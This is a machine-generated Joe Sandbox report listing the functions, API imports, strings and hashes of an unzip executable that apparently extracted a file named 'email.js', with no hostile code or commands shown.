Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: was$%$%d "zipfiles" were directories.$%d archive%s had fatal errors.$%d archive%s had warnings but no fatal errors.$%d archive%s successfully processed.$%d file%s had no zipfile directory.$s were
API String ID: 590974362-3397622360
Opcode ID: ea396c2716ca0110a319ff6d08f6cbb26b1947ae12097599b94602f4589b214d
Instruction ID: dd05b1f5bb20ea3f3237e0fcc344dc5a11d0ebbda7992f5026e9509b9afb6fe3
Opcode Fuzzy Hash: ea396c2716ca0110a319ff6d08f6cbb26b1947ae12097599b94602f4589b214d
Instruction Fuzzy Hash: 09511A706093159BC7249F15E08426FBBE0EB94758F54C83FE988A6751D7BD88C88B8E

Function 00417C60 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 134stringCOMMON

Download Yara Rule

APIs

localtime.MSVCRT ref: 00417C83
sprintf.MSVCRT ref: 00417D1E
strcpy.MSVCRT ref: 00417DEE
gmtime.MSVCRT ref: 00417E48

Strings

???? ??? ?? ??:??:??, xrefs: 00417DDF
%u %s %u %02u:%02u:%02u, xrefs: 00417DAF
%2u-%s-%02u %02u:%02u, xrefs: 00417D45
%03d, xrefs: 00417DC8
%04u%02u%02u.%02u%02u%02u, xrefs: 00417D13

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: gmtimelocaltimesprintfstrcpy
String ID: %03d$%04u%02u%02u.%02u%02u%02u$%2u-%s-%02u %02u:%02u$%u %s %u %02u:%02u:%02u$???? ??? ?? ??:??:??
API String ID: 3243531860-2889512523
Opcode ID: 6d26f4a23b1a8aea6c573b9d1d5ef4f789e42b738fdb7b92f9165e8026ae4550
Instruction ID: 0d755635aa5232229ccfb04a421f914b262ce9a764bb2dc93830d390634295ce
Opcode Fuzzy Hash: 6d26f4a23b1a8aea6c573b9d1d5ef4f789e42b738fdb7b92f9165e8026ae4550
Instruction Fuzzy Hash: 925102B19093159FC300DF15D48046AFBE1BF88754F95882EE8959B311E774EA8ACF8A

Function 00422230 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 78stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00422258
strlen.MSVCRT ref: 00422273
free.MSVCRT ref: 00422295
strchr.MSVCRT ref: 004222C4
calloc.MSVCRT ref: 004222DC
strncpy.MSVCRT ref: 004222EE
strchr.MSVCRT ref: 0042230B
_strdup.MSVCRT(?,?,?,?,?,?,004212C3), ref: 00422331
toupper.MSVCRT ref: 0042233E

Strings

:/, xrefs: 0042232A
/, xrefs: 004222FF

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strchrstrlen$_strdupcallocfreestrncpytoupper
String ID: :/$/
API String ID: 2532569224-4049411582
Opcode ID: d01f00a2c968888d9cc152ade576cfe7d2f283796fb88f863628efb51a38cfb3
Instruction ID: f69e328cff38d3e7379a630ad4b29987622bda98e0193a0b0dfdbef5498162a7
Opcode Fuzzy Hash: d01f00a2c968888d9cc152ade576cfe7d2f283796fb88f863628efb51a38cfb3
Instruction Fuzzy Hash: B3314170608762ABD710EF25A14423AFBE0BF44344FD58D6EE8D483302D7BD99448BAB

Function 0041CD60 Relevance: 18.1, APIs: 12, Instructions: 92memoryfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0041CDA9
GetKernelObjectSecurity.ADVAPI32 ref: 0041CDE7
GetLastError.KERNEL32 ref: 0041CDEF
CloseHandle.KERNEL32 ref: 0041CDFC
GetProcessHeap.KERNEL32 ref: 0041CE10
HeapAlloc.KERNEL32 ref: 0041CE28
GetKernelObjectSecurity.ADVAPI32 ref: 0041CE51
GetProcessHeap.KERNEL32 ref: 0041CE5D
HeapFree.KERNEL32 ref: 0041CE71
CreateFileA.KERNEL32 ref: 0041CED3
CloseHandle.KERNEL32 ref: 0041CEE7

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Heap$CloseCreateFileHandleKernelObjectProcessSecurity$AllocErrorFreeLast
String ID:
API String ID: 3886035097-0
Opcode ID: 769f9634f74ddfeb2db1ec8f0ed9c42b52f139ce723ccb730c82cb272f9f5784
Instruction ID: 3d083a1c8d31b3ffc644ed2bba7e7ac54c6dd40e5e5348368a403996c21953d4
Opcode Fuzzy Hash: 769f9634f74ddfeb2db1ec8f0ed9c42b52f139ce723ccb730c82cb272f9f5784
Instruction Fuzzy Hash: 584107B05083519BD300BF25D58931FBEE4AF84358F51892EF8888B251D779C6989B87

Function 0040B74D Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 144COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0040B954

Part of subcall function 0040A230: memcpy.MSVCRT(?,?,?,073AE000,00000000,00410ECD,?,?,?,?,00410655), ref: 0040A275

OemToCharA.USER32 ref: 0040B7CC
sprintf.MSVCRT ref: 0040B84A

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0040B823
%, xrefs: 0040B863, 0040B96D
warning: filename too long--truncating., xrefs: 0040B93F
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040B765, 0040B7BD, 0040B7C5, 0040B7E7, 0040B82B

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$Charmemcpy
String ID: %$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$warning: filename too long--truncating.
API String ID: 367625644-3668589293
Opcode ID: 16c72fc189e826c8dfeae09522fd892159e21b27fcdb887d4477e71be0a2b316
Instruction ID: bc474aa646f2266a6f4f65996de9a3a4818f4e5c5e4c8bafa25c522656dfa281
Opcode Fuzzy Hash: 16c72fc189e826c8dfeae09522fd892159e21b27fcdb887d4477e71be0a2b316
Instruction Fuzzy Hash: 1D5160B05093918BC320AF29904432ABBE5EF95308F54C96FE9D41B392C77D8985DBDE

Function 0041F330 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041F342
malloc.MSVCRT ref: 0041F34D
strcpy.MSVCRT ref: 0041F365
strrchr.MSVCRT ref: 0041F379
strcat.MSVCRT ref: 0041F3A4
SetErrorMode.KERNEL32 ref: 0041F3B0
free.MSVCRT ref: 0041F3CD
SetErrorMode.KERNEL32 ref: 0041F3D9

Strings

., xrefs: 0041F36A
.lnk, xrefs: 0041F383, 0041F395

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: ErrorMode$freemallocstrcatstrcpystrlenstrrchr
String ID: .$.lnk
API String ID: 2373612169-2551928977
Opcode ID: 5c56b98e9099f0c7e467952c1c24afc886ada901bef67042a97159baa6a3e0dc
Instruction ID: 5c361099d13e74e90292e0b8bafbffce456798fc59ff7a1efde9a4be0cd5e609
Opcode Fuzzy Hash: 5c56b98e9099f0c7e467952c1c24afc886ada901bef67042a97159baa6a3e0dc
Instruction Fuzzy Hash: 7B1130B16187149BD3007F76E48516FBBE4EF84358F81893EE8C887341D738C8858B5A

Function 0040EFD0 Relevance: 16.8, APIs: 11, Instructions: 256COMMON

Download Yara Rule

APIs

mblen.MSVCRT ref: 0040F002
mblen.MSVCRT ref: 0040F05E
tolower.MSVCRT ref: 0040F07D
tolower.MSVCRT ref: 0040F08A
mblen.MSVCRT ref: 0040F0F9
mblen.MSVCRT ref: 0040F1AB
mblen.MSVCRT ref: 0040F1D7

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: mblen$tolower
String ID:
API String ID: 794965741-0
Opcode ID: 1769d8d39b31282d5f19ad0bf5bd1a18188e7200394d700a1b7600284675a6e2
Instruction ID: e669e86d0d3ae4461e1a89d333850fb7a1d9e2c25a3e0b7f3dc02e0da6c5c481
Opcode Fuzzy Hash: 1769d8d39b31282d5f19ad0bf5bd1a18188e7200394d700a1b7600284675a6e2
Instruction Fuzzy Hash: 48A1AEB45087628FC730DF25C48022BBBE1AF95710F54487FE8C167792D379AC899B9A

Function 0040EAC0 Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A230: memcpy.MSVCRT(?,?,?,073AE000,00000000,00410ECD,?,?,?,?,00410655), ref: 0040A275

strncmp.MSVCRT ref: 0040EB28
strncmp.MSVCRT ref: 0040EDD1

Strings

/, xrefs: 0040ECE5
`pB, xrefs: 0040ED5C
%, xrefs: 0040EE25, 0040EE60, 0040EE95
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040EBD0, 0040EC0A, 0040ECC1, 0040ECED, 0040ED23, 0040ED69
\pB, xrefs: 0040ED16

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strncmp$memcpy
String ID: %$/$\pB$`pB$jre/jre-1.8/lib/deploy/email.js
API String ID: 2549481713-1007283115
Opcode ID: fb1c6e9011c505c9ce62494eec8e5f1f8c575930ffde982d028fa5435340cb80
Instruction ID: 9fe4c56d2708748b21a89d90e8ff83a65ddeb845d2ade68f517f226f7091c778
Opcode Fuzzy Hash: fb1c6e9011c505c9ce62494eec8e5f1f8c575930ffde982d028fa5435340cb80
Instruction Fuzzy Hash: F2A18DB0609711CBD310AF26D58022EB7E1FF80348F54883EE98567391EB7D9856DB9E

Function 00408E7C Relevance: 16.6, APIs: 4, Strings: 7, Instructions: 129COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00408749
sprintf.MSVCRT ref: 00408EEE
sprintf.MSVCRT ref: 00408F6B
sprintf.MSVCRT ref: 00408FCC

Strings

[text] , xrefs: 00409011
jre/jre-1.8/lib/deploy/email.js, xrefs: 00408F29, 00408F72
[binary], xrefs: 0040900A
%, xrefs: 00408762, 00408F07, 00408FE5
not enough memory to , xrefs: 00408ECF, 00408F44
jre/jre-1.8/lib/deploy/email.js, xrefs: 00408F31, 00408F7A
invalid compressed data to , xrefs: 00408ED6, 00408F53

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: %$[binary]$[text] $invalid compressed data to $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$not enough memory to
API String ID: 590974362-1484113268
Opcode ID: 85b37438ab9d2ad29c4ba4d749a719130fbc4f9d48110f93d313d261dca51125
Instruction ID: 5877c7a631d21ea94a7d1a04c169453b560f6d1767aefc39b28e9d1aaff9c1f5
Opcode Fuzzy Hash: 85b37438ab9d2ad29c4ba4d749a719130fbc4f9d48110f93d313d261dca51125
Instruction Fuzzy Hash: FC512D7060A7119BC7109F25964421EBBE0AB80754F95C83FE8C5AB391DFBC8885DB9E

Function 00421770 Relevance: 16.6, APIs: 11, Instructions: 86stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00421797
GetFullPathNameA.KERNEL32(?,?,?,?,?,?,00421767,?,?,00421649), ref: 004217B5
_errno.MSVCRT ref: 004217D2
_errno.MSVCRT ref: 004217DD
_errno.MSVCRT ref: 00421810
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00421767,?,?,00421649), ref: 0042182C
realloc.MSVCRT ref: 00421843
GetFullPathNameA.KERNEL32 ref: 0042185D
_errno.MSVCRT ref: 00421871
_errno.MSVCRT ref: 0042187C
_errno.MSVCRT ref: 00421889

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno$FullNamePath$mallocreallocstrcpy
String ID:
API String ID: 131080767-0
Opcode ID: 6260f9b2b257c67a40ebfb9cf44c3a898e3993a961dfcd489db262551eaa02f9
Instruction ID: c2ed28429fcdabb9c92113fbcc3ca2a99ad07e67fa6a848b6a0eb115a6ce9eef
Opcode Fuzzy Hash: 6260f9b2b257c67a40ebfb9cf44c3a898e3993a961dfcd489db262551eaa02f9
Instruction Fuzzy Hash: 013197B1A047609EC3117F26E48127BBBD0AF91344FC5485FE4C94B322D77C8541C79A

Function 0040E5C9 Relevance: 15.2, APIs: 4, Strings: 6, Instructions: 245stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 0040E018
strcpy.MSVCRT ref: 0040E1DF
sprintf.MSVCRT ref: 0040E235
sprintf.MSVCRT ref: 0040E2CE

Strings

gfff, xrefs: 0040E1A0
`pB, xrefs: 0040E626
%, xrefs: 0040E2E9
, xrefs: 0040E195
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040E5E4, 0040E633
\pB, xrefs: 0040E5D6

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$strcpystrncmp
String ID: $%$\pB$`pB$gfff$jre/jre-1.8/lib/deploy/email.js
API String ID: 1668429700-38385569
Opcode ID: 3d2b946dc46a3c4b6b9445ce7da79a29f21b13d7e7ee2e49cdd97d5351f9908b
Instruction ID: c990bb7fd844c5054ea20ca17846036a69ca5a6a35a670aa55f846fdf47149f4
Opcode Fuzzy Hash: 3d2b946dc46a3c4b6b9445ce7da79a29f21b13d7e7ee2e49cdd97d5351f9908b
Instruction Fuzzy Hash: FCB16B719093518BC324DF26D58022BFBE1BF94704F548D3EE8D867391EB78A855CB8A

Function 00402F84 Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 176COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00402B42
sprintf.MSVCRT ref: 00402FDF

Strings

, xrefs: 00403480
, xrefs: 00403490
%, xrefs: 00402B5B, 00402FF8, 00403432, 00403463, 004034BC
, xrefs: 00403488
, xrefs: 00403478

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: $ $ $ $%
API String ID: 590974362-1143128908
Opcode ID: 6c15d98a26d775081d972f26739ea0009a8fbe08b73276266dec1b3b5cb4a077
Instruction ID: f1074583b7ad38223c811eca16a781e204d0a1c895aa140f2ce4fe6b622caccb
Opcode Fuzzy Hash: 6c15d98a26d775081d972f26739ea0009a8fbe08b73276266dec1b3b5cb4a077
Instruction Fuzzy Hash: 54715DB060A7119BD7209F05D64822FBBE0FB90754F84C86EE8846B3D1D7F89845CB9A

Function 004089F6 Relevance: 15.1, APIs: 4, Strings: 6, Instructions: 112COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00408749
sprintf.MSVCRT ref: 00408A63
sprintf.MSVCRT ref: 00408AAF
sprintf.MSVCRT ref: 00408B0C

Strings

[text] , xrefs: 00408B4A
jre/jre-1.8/lib/deploy/email.js, xrefs: 00408A2C, 00408AB6
[binary], xrefs: 00408B43
%, xrefs: 00408762, 00408A7C, 00408B25
not enough memory to , xrefs: 00408A4C, 00408A98
jre/jre-1.8/lib/deploy/email.js, xrefs: 00408A34, 00408ABE

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: %$[binary]$[text] $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$not enough memory to
API String ID: 590974362-2571094736
Opcode ID: e69414d06f2d6e394b2ce03940bd5d43568c3b93d43179d8d1557e16b77de2c9
Instruction ID: ae2c04fa8b3995551ed65dad926b112aaec1ffa6113b8ceb714f241b298c53e4
Opcode Fuzzy Hash: e69414d06f2d6e394b2ce03940bd5d43568c3b93d43179d8d1557e16b77de2c9
Instruction Fuzzy Hash: 454138B060A7119BC3109F15964421EBBE0AB80758F95C83FE8C5AB391DFBC8845CF9E

Function 0040B300 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

_lseeki64.MSVCRT ref: 0040B624
_read.MSVCRT ref: 0040B649

Strings

--- Press `Q' to quit, or any other key to continue ---, xrefs: 0040B4E9
@, xrefs: 0040B4AE
%, xrefs: 0040B3E0, 0040B3F0, 0040B43F, 0040B482, 0040B4C6, 0040B4F1

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _lseeki64_read
String ID: %$--- Press `Q' to quit, or any other key to continue ---$@
API String ID: 929985560-3830890354
Opcode ID: 29c320102ec4ab66e20076be7d6122d3d6420912f68546c7fb8018a1291a4e9b
Instruction ID: 9fd06204f6d01bce502a5d46ef9c6a3dedc05eaf82ead04980fcefeeb507ac1b
Opcode Fuzzy Hash: 29c320102ec4ab66e20076be7d6122d3d6420912f68546c7fb8018a1291a4e9b
Instruction Fuzzy Hash: A0A1CE706093508BC3108F25D88436BBBE1EB95308F58887EE8C567392DB7C9949CBDE

Function 0040A97F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 213COMMON

Download Yara Rule

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0040ABE3
%, xrefs: 0040A7DD, 0040A885, 0040AC23
%s: write error (disk full?). Continue? (y/n/^C) , xrefs: 0040ABFB
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040ABEB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID: %$%s: write error (disk full?). Continue? (y/n/^C) $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 0-2870516294
Opcode ID: 10a8c6372db6380eca8faa4a5eea38b6f179626d3652a54068f15ce6e188de00
Instruction ID: 5fb4b28d641e7d8db65061c1e8b3cbb71c64d1efe90c0f8aaf2d003473639670
Opcode Fuzzy Hash: 10a8c6372db6380eca8faa4a5eea38b6f179626d3652a54068f15ce6e188de00
Instruction Fuzzy Hash: 2181C0716083119FC714DF29D98022BBBE1FBC4704F558A7EE889A7391D7789C528F8A

Function 0041972C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

_isctype.MSVCRT ref: 004192DE
sprintf.MSVCRT ref: 0041933B
sprintf.MSVCRT ref: 00419757

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00419314, 00419730
%, xrefs: 00419354, 00419770
warning: skipped "../" path component(s) in %s, xrefs: 00419748
jre/jre-1.8/lib/deploy/email.js, xrefs: 00419281, 0041931C, 00419738
mapname: conversion of %s failed, xrefs: 0041932C

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$Char_isctype
String ID: %$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$mapname: conversion of %s failed$warning: skipped "../" path component(s) in %s
API String ID: 2057872821-2775452856
Opcode ID: c54b60ddd6ca4dcf56d9a042fe4e225024976c8a1ab40378976cb01ca5dd16d2
Instruction ID: 6ea886861464d28ec60f178fb8c883dc54dae0631024acae249876ee92e166e5
Opcode Fuzzy Hash: c54b60ddd6ca4dcf56d9a042fe4e225024976c8a1ab40378976cb01ca5dd16d2
Instruction Fuzzy Hash: CD317AB0909750AFD310AF25D45436EBBE0AF85354F84C86EE4C457352DBBC9884DB9A

Function 0040314C Relevance: 13.7, APIs: 4, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00402B42

Strings

, xrefs: 00403480
, xrefs: 00403490
%, xrefs: 00402B5B, 00403150, 0040315A, 00403171, 00403432, 00403463, 004034BC
, xrefs: 00403488
, xrefs: 00403478

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: $ $ $ $%
API String ID: 590974362-1143128908
Opcode ID: a44e89610175f24dfcbdd791476836172e0d6e74953f00990d281e1a441ebed4
Instruction ID: a905e74276f9f476401ef48083fd36491381c1bfcfe9b131bd98ea421e036406
Opcode Fuzzy Hash: a44e89610175f24dfcbdd791476836172e0d6e74953f00990d281e1a441ebed4
Instruction Fuzzy Hash: 28615DB060A7119BD7209F05D54831FBBE0FB94748F94C87EE8846B3D1D7B89845CB8A

Function 00403D45 Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 119stringCOMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00403E70
strlen.MSVCRT ref: 00403E88
malloc.MSVCRT ref: 00403E91
strcpy.MSVCRT ref: 00403EB4
malloc.MSVCRT ref: 00403ED3
free.MSVCRT ref: 00403EFB

Strings

Q, xrefs: 00403DF4
%, xrefs: 00403E08
